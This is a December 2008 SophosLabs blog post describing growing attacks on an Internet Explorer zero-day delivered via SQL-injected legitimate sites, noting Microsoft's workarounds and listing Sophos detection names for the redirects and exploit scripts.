All I want for Christmas… is a patch
As predicted last week, the volume of attacks looking to exploit the zero day vulnerability in Internet Explorer (advisory 961051) browsers is steadily growing. We are seeing many attacks where the bundle of exploits being used to infect victims now includes content to exploit this new vulnerability. (You can read our vulnerability assessment information here.)
And the topic is now clearly front page news. Literally. Earlier this morning, I see it mentioned on the front page of the BBC web site.
The tried and trusted technique of compromising legitimate web sites is being used to redirect victims to these malicious attack sites. Once again, SQL injection techniques appear to have been used to hit sites (also reported by ISC). So, adopting safe browsing habits is not necessarily sufficient to prevent yourself getting exposed to malicious code.
Microsoft blogged about porn sites being used to infect victims. Whether these sites were compromised or merely set up to lure victims is not clear, though is largely irrelevant.
So what can users do? One option is to decipher the workarounds posted by Microsoft in their advisory. Mmm, definitely not trivial. Some more details on the workarounds are available from a recent posting on the technet site, but this is no simple option (there is no nice “killbit solution” for this one).
Whatever their browser choice, users must ensure they have up to date, effective security in place to defend them against today’s threats. Quality generic detections are proven to be effective against new malware, and URL filtering can add a significant layer of protection against web-borne threats.
For Sophos customers, protection is provided at a series of levels.
- Detection of the redirects from compromised sites. Mal/Badsrc-C, Mal/Iframe-F.
- Detection of the redirects used within the attack sites. Troj/Iframe-* (various), Mal/Iframe-G.
- Detection of the script components used to exploit this vulnerability. Exp/Datbi-A, Troj/JSShell-E, Mal/JSShell-B
- Prevention of the buffer overflow delivering its payload. BOPs.
Additionally, the data intelligence we are gathering on these attacks is being used to blacklist the malicious URLs being used, to boost protection for customers using the web appliance.
It will be interesting to see how quickly Microsoft can make a patch available for this one. With the Christmas and New Year period looming, even if a patch is made available out of the regular monthly cycle, many organisations will be unable to deploy it immediately anyway.
And for all those little netbooks wrapped up and awaiting opening, take care to ensure they are properly secured prior to getting online and sending festive e-cards…
Posted on December 16th, 2008 by Fraser Howard, SophosLabs UKFiled under: General
Windows 7 security - A great leap forward or business as usual?
